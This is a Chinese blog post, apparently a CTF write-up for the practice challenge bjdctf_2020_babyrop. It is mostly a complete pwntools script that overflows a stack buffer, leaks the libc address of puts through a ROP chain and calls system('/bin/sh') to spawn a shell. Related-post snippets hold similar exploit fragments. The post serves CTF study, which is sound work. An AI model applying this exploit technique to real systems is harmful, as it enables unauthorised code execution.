bjdctf_2020_babyrop

最新推荐文章于 2023-12-17 18:22:17 发布
最新推荐文章于 2023-12-17 18:22:17 发布
阅读量519 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: linux c语言 运维 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121737441
版权
该博客展示了如何利用pwn库进行返回到PLT(Return-to-PLT)攻击,详细步骤包括设置环境、寻找地址、构造payload并最终执行system调用获取shell。涉及到的技术包括AMD64架构、Linux操作系统、gdb调试和libc库。
摘要由CSDN通过智能技术生成

bjdctf_2020_babyrop

查看保护
请添加图片描述
请添加图片描述
运行之后都说了return

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25811)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
pop_rdi_ret = 0x0000000000400733

libc = ELF('./libc-2.23.so')

p1 = b'a' * (0x20 + 8) + p64(pop_rdi_ret) + p64(puts_got)
p1 += p64(puts_plt) + p64(main_addr)
r.sendline(p1)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()

p2 = b'a' * (0x20 + 8) + p64(pop_rdi_ret) + p64(bin_sh)
p2 += p64(system_addr)
r.sendline(p2)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 710
bjdctf_2020_babyrop
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 337
bjdctf_2020_babyrop
pwn】gwctf_2019_easy_pwn
Nothing
12-09 917
例行检查 分析程序,这个程序是c++写的。在往s中read的时候大小没有问题,但是程序在下面将字符"I"替换成了"pretty",最后在strcpy的时候发生了溢出,没有PIE和canary直接利用即可。 from pwn import * io=remote('node3.buuoj.cn','27671') puts_plt=0x8048DC0 puts_got=0x804C068 main...
[BJDCTF 2020]babyrop
最新发布
沈理大学牲的博客
12-17 294
puts_add = u64(i.recv(6).ljust(8,b'\x00'))用来接收plt表中的puts的真实地址的。提醒一下,elf.ELF是()不是[]不难,按照以往的就可以。
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
GWCTF 2019]枯燥的抽奖
zxnimud5的专栏
09-12 526
php伪随机 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type:text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed']); $str_long1="abcdefghijklmnopqrstuvwxyz0123456789ABCDEF...
BUUCTF-pwn(14)
njh18790816639的博客
01-23 3509
gwctf_2019_jiandan_pwn1 简单ret2libc,唯一需要注意的便是注意修改索引值,防止索引被覆盖!从而无法进行栈溢出! from pwn import * from LibcSearcher import LibcSearcher context(os='linux',arch='amd64',log_level='debug') binary = './pwn' r = remote('node4.buuoj.cn',25586) #r = process(binary) elf
[GW-CTF2019] babyvm
0.2°的博客
09-09 377
- [目录] 分析 脚本 总结 GW CTF2019 babyvm 复现 得到一个文件 先exeinfope 64位elf文件 打开后找到main函数 第一个是初始化,第二个是退出,第三个检查flag(但是分析完会发现这个是假的) init进去后 分析完后 分析完后根据自己理解分析出他的指令集 |0xF1|MOV | |0xF2|XOR–| |0xF4|NOP | |0xF5|read_str | |0xF7|computing–| |0xF6 |mul | |0xF8|swap | p
BUU刷题(三)
playmaker的博客
03-13 983
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 410
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
[GWCTF 2019]枯燥的抽奖
qq_43801002的博客
08-03 2317
题目 过程 1.php种子伪随机数,seed。 mt_scrand(seed)函数通过分发seed种子,然后种子有了后,靠mt_rand()生成随机数。 举个例子,两次随机数生成竟然是存在一样的。 其实这就是伪随机数的漏洞,存在可预测性。 生成伪随机数是线性的,你可以理解为y=ax,x就是种子,知道种子和一组伪随机数不是就可以推y(伪随机数了吗),当然实际上更复杂肯定。 我知道种子后,可以确定你输出伪随机数的序列。 2.知道你的随机数序列,可以确定你的种子。 此处使用c语言脚本,脚本自取。 kali
[GWCTF 2019]xxor 笔记
HLi1219的博客
11-04 661
感觉自己逆向还没有入门。。。。。。还需要多做题 利用PE查壳得他是一个64位的文件,用相应的ida打开找的mian的函数 我们会输入六个数组来得到flag 先看sub_400770这个函数 这里的a1[0]和a1[5]是不是ida翻译错了,然后查看汇编将他们对应的16进制转化了一下,发现是真的错了,还是要多看看汇编。 算是一个比较简单的检验函数,经过计算得的个a1[]的值为:3746099070, 550153460, 3774025685, 1548802262, 26526264.
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2922
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值